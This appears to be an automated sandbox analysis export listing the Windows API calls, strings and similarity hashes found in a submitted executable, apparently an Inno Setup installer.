                                                          • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A65
                                                          • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AD4
                                                          • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B6F
                                                          • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BAE
                                                          Similarity
                                                          • API ID: LoadString$FileMessageModuleName
                                                          • API String ID: 704749118-0
                                                          APIs
                                                          • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E905
                                                            • Part of subcall function 0044CF48: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF7A
                                                          • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E989
                                                            • Part of subcall function 0042BBAC: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBC0
                                                          • IsRectEmpty.USER32(?), ref: 0044E94B
                                                          • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E96E
                                                          Similarity
                                                          • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                          • API String ID: 855768636-0
                                                          APIs
                                                          • OffsetRect.USER32(?,?,00000000), ref: 00494E94
                                                          • OffsetRect.USER32(?,00000000,?), ref: 00494EAF
                                                          • OffsetRect.USER32(?,?,00000000), ref: 00494EC9
                                                          • OffsetRect.USER32(?,00000000,?), ref: 00494EE4
                                                          Similarity
                                                          • API ID: OffsetRect
                                                          • API String ID: 177026234-0
                                                          APIs
                                                          • GetCursorPos.USER32 ref: 00417258
                                                          • SetCursor.USER32(00000000), ref: 0041729B
                                                          • GetLastActivePopup.USER32(?), ref: 004172C5
                                                          • GetForegroundWindow.USER32(?), ref: 004172CC
                                                          Similarity
                                                          • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                          • API String ID: 1959210111-0
                                                          APIs
                                                          • MulDiv.KERNEL32(8B500000,00000008,?), ref: 00494AFD
                                                          • MulDiv.KERNEL32(50142444,00000008,?), ref: 00494B11
                                                          • MulDiv.KERNEL32(F70A2BE8,00000008,?), ref: 00494B25
                                                          • MulDiv.KERNEL32(8BF88BFF,00000008,?), ref: 00494B43
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: da8da1de4e7f5bc81aa34d833cd20809ae9834e6658fde7f29423bed1a0b2134
• Instruction ID: 4e21b8649f01b029d01931fbc34569bb41b57a17a8c4fb2cd57aac9c741bb68b
• Opcode Fuzzy Hash: da8da1de4e7f5bc81aa34d833cd20809ae9834e6658fde7f29423bed1a0b2134
• Instruction Fuzzy Hash: 1F113072605104AFCF40DFA9C8C5E9B7BECEF8D320B1541AAF908DB246D634ED418B68
APIs
• GetClassInfoA.USER32(00400000,0041F468,?), ref: 0041F499
• UnregisterClassA.USER32(0041F468,00400000), ref: 0041F4C2
• RegisterClassA.USER32(00499598), ref: 0041F4CC
• SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F507
Similarity
• API ID: Class$InfoLongRegisterUnregisterWindow
• String ID:
• API String ID: 4025006896-0
• Opcode ID: 369d2da58285a6866fdf7dc2e280d06892b8d6024adb0aca680e52ce00aa00df
• Instruction ID: e4d668e9dca91fd32e585eae6d60143d6dfbdf42e70c096e3b85bfad9ab1786c
• Opcode Fuzzy Hash: 369d2da58285a6866fdf7dc2e280d06892b8d6024adb0aca680e52ce00aa00df
• Instruction Fuzzy Hash: 63016D722001046BDB10EBACED81E9B3798A729314B10423FBA15E73A2D7399D458BAC
APIs
• FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D20F
• LoadResource.KERNEL32(00400000,72756F73,0040A9B0,00400000,00000001,00000000,?,0040D16C,00000000,?,00000000,?,?,0047C33C,0000000A,00000000), ref: 0040D229
• SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A9B0,00400000,00000001,00000000,?,0040D16C,00000000,?,00000000,?,?,0047C33C), ref: 0040D243
• LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A9B0,00400000,00000001,00000000,?,0040D16C,00000000,?,00000000,?), ref: 0040D24D
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
• Opcode ID: 0bf80b66a5ada5cede639d51b96412ae59566757451319f02a49a05eb7d51380
• Instruction ID: 3283e33870439dafd25d8e1e147512606e62b5bf6a0133693b61d2317928fdf1
• Opcode Fuzzy Hash: 0bf80b66a5ada5cede639d51b96412ae59566757451319f02a49a05eb7d51380
• Instruction Fuzzy Hash: C5F04FB26056047F8B04EE99A881D5B77DDDE88264314027EF908EB242DA38DD018B69
APIs
• GetLastError.KERNEL32(?,00000000), ref: 00470411
Strings
• Failed to set NTFS compression state (%d)., xrefs: 00470422
• Setting NTFS compression on file: %s, xrefs: 004703DF
• Unsetting NTFS compression on file: %s, xrefs: 004703F7
Similarity
• API ID: ErrorLast
• String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
• API String ID: 1452528299-3038984924
• Opcode ID: 32800ea80ef7f340448f7304649e5167e10847fac6a49cadc2e3199de093b0c6
• Instruction ID: 0d596443d05caf7374ea98a63d842d8765eee9d82fb477a7c18f0f713548320e
• Opcode Fuzzy Hash: 32800ea80ef7f340448f7304649e5167e10847fac6a49cadc2e3199de093b0c6
• Instruction Fuzzy Hash: 3601A730E0924896CB14D7AD94412EDBBB48F09304F54C1EFB85CE7382DB780A098B9A
APIs
• GetLastError.KERNEL32(00000000,00000000), ref: 0046FC65
Strings
• Setting NTFS compression on directory: %s, xrefs: 0046FC33
• Failed to set NTFS compression state (%d)., xrefs: 0046FC76
• Unsetting NTFS compression on directory: %s, xrefs: 0046FC4B
Similarity
• API ID: ErrorLast
• String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
• API String ID: 1452528299-1392080489
• Opcode ID: b5dc9d2579f2018d9a7d7e75725accde34884e18dd6de742cde32242bcb11ea0
• Instruction ID: 1ff60dd8eb5a114f2a7af6b3d642365226de0c959c43d8a3966afd89414ec8a0
• Opcode Fuzzy Hash: b5dc9d2579f2018d9a7d7e75725accde34884e18dd6de742cde32242bcb11ea0
• Instruction Fuzzy Hash: 5B011730E0824C56CB04D7ADA4412DDBBB4AF4D314F54C5BFA899D7382EA790A0D879B
APIs
  • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
• RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045B5CE,?,?,?,?,?,00000000,0045B5F5), ref: 00455DAC
• RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045B5CE,?,?,?,?,?,00000000), ref: 00455DB5
• RemoveFontResourceA.GDI32(00000000), ref: 00455DC2
• SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455DD6
Similarity
• API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
• String ID:
• API String ID: 4283692357-0
• Opcode ID: cc4ceb729e222824fe1cac9382ec9995b1fa7ba0c709305ca7eece31e51928de
• Instruction ID: 990a694f9916720730b0810028faebd1b23d30e86244cf38efb64550af4b0806
• Opcode Fuzzy Hash: cc4ceb729e222824fe1cac9382ec9995b1fa7ba0c709305ca7eece31e51928de
• Instruction Fuzzy Hash: 7CF090B274070036EA10B6B65C46F2B12DC8F54745F10883AB500EF2C3D57CDC044629
APIs
Similarity
• API ID: ErrorLast$CountSleepTick
• String ID:
• API String ID: 2227064392-0
• Opcode ID: 4bb6a74b997c72d79b8ad59ba38197016887a39ac959a09613ad40c6f540370d
• Instruction ID: a2b460aa88ecba94892aad5d964071206a8b0d845d3bc1a6a013ae29a0728730
• Opcode Fuzzy Hash: 4bb6a74b997c72d79b8ad59ba38197016887a39ac959a09613ad40c6f540370d
• Instruction Fuzzy Hash: 6FE02B627C916065C62131BE18C25BF464CCBC3364B24463FF0CCE7242C85D5C4A873E
APIs
• GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,004808CA,?,?,?,?,?,004981E7,00000000), ref: 00477CA1
• OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004808CA,?,?,?,?,?,004981E7), ref: 00477CA7
• GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004808CA), ref: 00477CC9
• CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004808CA), ref: 00477CDA
Similarity
• API ID: ProcessToken$CloseCurrentHandleInformationOpen
• String ID:
• API String ID: 215268677-0
• Opcode ID: b789e398f767a3985276fb9b5d86dc0112f39c9ab3e6b0e60025eb20b1cc62c1
• Instruction ID: 672a73815fb629360b1666c66e1be5f1e4265ed7d7d078eef31aabbee9319095
• Opcode Fuzzy Hash: b789e398f767a3985276fb9b5d86dc0112f39c9ab3e6b0e60025eb20b1cc62c1
• Instruction Fuzzy Hash: 5FF037716447007FD600E6B58D81E5B73DCEB44354F04883A7E94D71C1D678DC08A726
APIs
• GetLastActivePopup.USER32(?), ref: 00424244
• IsWindowVisible.USER32(?), ref: 00424255
• IsWindowEnabled.USER32(?), ref: 0042425F
• SetForegroundWindow.USER32(?), ref: 00424269
Similarity
• API ID: Window$ActiveEnabledForegroundLastPopupVisible
• String ID:
• API String ID: 2280970139-0
• Opcode ID: d650e12b06832ca1638fa5ec8b7c167202b76d470459cb5fe6943c9b368570a5
• Instruction ID: 914cdc97238bca482b123af495550876eb6964b08c7fad051248fc704dde4b2b
• Opcode Fuzzy Hash: d650e12b06832ca1638fa5ec8b7c167202b76d470459cb5fe6943c9b368570a5
• Instruction Fuzzy Hash: DEE0EC61706636D7AAA2767B2981A9F618D9DC53C434601ABFC04FB386DB2CDC1181BD
APIs
• GlobalHandle.KERNEL32 ref: 0040626F
• GlobalUnlock.KERNEL32(00000000), ref: 00406276
• GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040627B
• GlobalLock.KERNEL32(00000000), ref: 00406281
Similarity
• API ID: Global$AllocHandleLockUnlock
• String ID:
• API String ID: 2167344118-0
• Opcode ID: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
• Instruction ID: 5df08fd8dc2b017785a639aa93036e57be915985ffe03f20f856cac12e18577c
• Opcode Fuzzy Hash: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
• Instruction Fuzzy Hash: 0BB009C4810A01BEEC0473B24C0BE3F245CD88172C3904A6F3448BA183987C9C405A3A
APIs
• RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047B44D,?,00000000,00000000,00000001,00000000,00479E79,?,00000000), ref: 00479E3D
Strings
• Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 00479CB1
• Failed to parse "reg" constant, xrefs: 00479E44
Similarity
• API ID: Close
• String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
• API String ID: 3535843008-1938159461
• Opcode ID: 57bad9c4411a7bf74c6c2dc4fda695579502af0604f82715b5200038b1ffad30
• Instruction ID: 5eaaab04e28549974a1eae9ca1a9eb8293ffddd3d671f6967ea537ac56f3ac17
• Opcode Fuzzy Hash: 57bad9c4411a7bf74c6c2dc4fda695579502af0604f82715b5200038b1ffad30
• Instruction Fuzzy Hash: 81814174E00148AFCF11DF95C881ADEBBF9AF49314F50816AE815BB391D738AE45CB98
APIs
• GetForegroundWindow.USER32(00000000,00482CD2,?,00000000,00482D13,?,?,?,?,00000000,00000000,00000000,?,0046BBB9), ref: 00482B81
• SetActiveWindow.USER32(?,00000000,00482CD2,?,00000000,00482D13,?,?,?,?,00000000,00000000,00000000,?,0046BBB9), ref: 00482B93
Strings
• Will not restart Windows automatically., xrefs: 00482CB2
                                                          Similarity
                                                          • API ID: Window$ActiveForeground
                                                          • String ID: Will not restart Windows automatically.
                                                          • API String ID: 307657957-4169339592
                                                          • Opcode ID: 79c316d51ac1fd79a21ce3b82f97925ffc45febbfcb1c28b0a7bd5593e75f807
                                                          • Instruction ID: 4958210349c6873c441c743532f51790e4d62edc104a08ffbd951144213b1fca
                                                          • Opcode Fuzzy Hash: 79c316d51ac1fd79a21ce3b82f97925ffc45febbfcb1c28b0a7bd5593e75f807
                                                          • Instruction Fuzzy Hash: 3541F130248240AED711FBA5EE96BBD7BE4EB55304F540CB7E8405B3A2D2FD68419B1D
                                                          APIs
                                                          • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,004021FC), ref: 004020CB
                                                            • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0227C378,00003C84,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                            • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0227C378,00003C84,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                            • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0227C378,00003C84,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                            • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0227C378,00003C84,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                          • String ID: $O
                                                          • API String ID: 296031713-4089063739
                                                          • Opcode ID: 0ec3421781df831a678c5902f9bdaa3f76644b0125f074e6ded90038b86c12b3
                                                          • Instruction ID: 30adadd309813d1a6846ca6b4958dbaac508113c784b73a5bb8d11bfdb372a30
                                                          • Opcode Fuzzy Hash: 0ec3421781df831a678c5902f9bdaa3f76644b0125f074e6ded90038b86c12b3
                                                          • Instruction Fuzzy Hash: 3941E3B2E00304DFDB10CF69EE8521A77A4F7A8324B15417FD854A77E2D3789801DB88
                                                          Strings
                                                          • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CB58
                                                          • Failed to proceed to next wizard page; aborting., xrefs: 0046CB44
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                          • API String ID: 0-1974262853
                                                          • Opcode ID: dc43be0607ecfeeda5f653db28b3a442006743007c0b64165f9b1b6a3889c3b5
                                                          • Instruction ID: 55592184c39aac83035684310b8d0626f6b8fe487ab2a4e85d8be474453688ef
                                                          • Opcode Fuzzy Hash: dc43be0607ecfeeda5f653db28b3a442006743007c0b64165f9b1b6a3889c3b5
                                                          • Instruction Fuzzy Hash: 49318D30604208DFD711EB99D98ABAA77F5EB05704F5500BBF448AB3A2D7797E40CB4A
                                                          APIs
                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                          • RegCloseKey.ADVAPI32(?,00478A12,?,?,00000001,00000000,00000000,00478A2D), ref: 004789FB
                                                          Strings
                                                          • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478986
                                                          • %s\%s_is1, xrefs: 004789A4
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen
                                                          • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                          • API String ID: 47109696-1598650737
                                                          • Opcode ID: 203e9cdef3f3c7d05f9cd135bcc4e7d95a8ba7022c08c76649149ec0e531cbaf
                                                          • Instruction ID: 1902e23b80ae68d1a407740dd401f48df33a1007776b0bbafa0d95379bb3c34b
                                                          • Opcode Fuzzy Hash: 203e9cdef3f3c7d05f9cd135bcc4e7d95a8ba7022c08c76649149ec0e531cbaf
                                                          • Instruction Fuzzy Hash: AF216474B402449FDB01DBAACC556DEBBE8EB89704F91847FE408E7381DB789D018B59
                                                          APIs
                                                          • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501D1
                                                          • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00450202
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ExecuteMessageSendShell
                                                          • String ID: open
                                                          • API String ID: 812272486-2758837156
                                                          • Opcode ID: d3a35c962c87995e6f353dcc7f0390f1f3aba8aca929dc82464802214bb86f4f
                                                          • Instruction ID: 7e6871a26ddddf45a22869efb5a26db0f3e7f81d2927c2b78b58bd6f76e5dadf
                                                          • Opcode Fuzzy Hash: d3a35c962c87995e6f353dcc7f0390f1f3aba8aca929dc82464802214bb86f4f
                                                          • Instruction Fuzzy Hash: EE216274E00204AFDB04DFA5C889E9EB7F8EB44705F2085BAB814E7292D7789E44CA48
                                                          APIs
                                                          • ShellExecuteEx.SHELL32(0000003C), ref: 00455300
                                                          • GetLastError.KERNEL32(0000003C,00000000,00455349,?,?,?), ref: 00455311
                                                            • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: DirectoryErrorExecuteLastShellSystem
                                                          • String ID: <
                                                          • API String ID: 893404051-4251816714
                                                          • Opcode ID: 9439c815502d76cae9d9bfb6546d04338fea16b38e0c711b75209bdd8176d4bf
                                                          • Instruction ID: ab6e9011ac2a47c3b5942fb44236b8cd8890e3b7caf9c3a2037be21c94c6989b
                                                          • Opcode Fuzzy Hash: 9439c815502d76cae9d9bfb6546d04338fea16b38e0c711b75209bdd8176d4bf
                                                          • Instruction Fuzzy Hash: 3F212370600609AFDB10EF65D8926EE7BE8AF48355F90403AFC44E7281D7789E45CB98
                                                          APIs
                                                          • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                          • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                            • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0227C378,00003C84,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                            • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0227C378,00003C84,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                            • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0227C378,00003C84,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                            • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0227C378,00003C84,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                          • String ID: )
                                                          • API String ID: 2227675388-1084416617
                                                          • Opcode ID: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                          • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                          • Opcode Fuzzy Hash: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                          • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496075
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Window
                                                          • String ID: /INITPROCWND=$%x $@
                                                          • API String ID: 2353593579-4169826103
                                                          • Opcode ID: ecbf6afcec96af61fcb478e5b0f8d10ed6ae26bf43725b19494f09826110d62b
                                                          • Instruction ID: 17582354874f3a564912cfd2224966d9f48ebc88dda7ed38b5aba0a92b935dc2
                                                          • Opcode Fuzzy Hash: ecbf6afcec96af61fcb478e5b0f8d10ed6ae26bf43725b19494f09826110d62b
                                                          • Instruction Fuzzy Hash: 1111B731A042448FDF01DBA4D892BAE7FE8EB48314F51447BE504E7282D73C9905CB5C
                                                          APIs
                                                            • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                            • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                          • SysFreeString.OLEAUT32(?), ref: 004474BE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: String$AllocByteCharFreeMultiWide
                                                          • String ID: NIL Interface Exception$Unknown Method
                                                          • API String ID: 3952431833-1023667238
                                                          • Opcode ID: 456d6725a948a64f68b75857ecf673ecd15b77dd67b08c070dfb7a2d7b0a1602
                                                          • Instruction ID: e495528c603fed7e49a6c7636a2d67f8de45625ce5c80b81863372b855da2a7d
                                                          • Opcode Fuzzy Hash: 456d6725a948a64f68b75857ecf673ecd15b77dd67b08c070dfb7a2d7b0a1602
                                                          • Instruction Fuzzy Hash: 7A11D670604208AFEB14DFA58952A6EBFBCEB08304F91447EF504E7282D7789D05CB69
                                                          APIs
                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495974,?,00495968,00000000,0049594F), ref: 0049591A
                                                          • CloseHandle.KERNEL32(004959B4,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495974,?,00495968,00000000), ref: 00495931
                                                            • Part of subcall function 00495804: GetLastError.KERNEL32(00000000,0049589C,?,?,?,?), ref: 00495828
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateErrorHandleLastProcess
                                                          • String ID: <cI
                                                          • API String ID: 3798668922-2480932022
                                                          • Opcode ID: 34c6542742eff2dadab3d088a7a61d5c053afa182c64a6caa50429fa903ca566
                                                          • Instruction ID: 6201355901f458c0f36557428e85d419ca31de49550c26c5d668688d9bb1e683
                                                          • Opcode Fuzzy Hash: 34c6542742eff2dadab3d088a7a61d5c053afa182c64a6caa50429fa903ca566
                                                          • Instruction Fuzzy Hash: 660161B1644648AFEF05DBA2DC42FAEBBACDF48714F61003BF504E7291D6785E05CA68
                                                          APIs
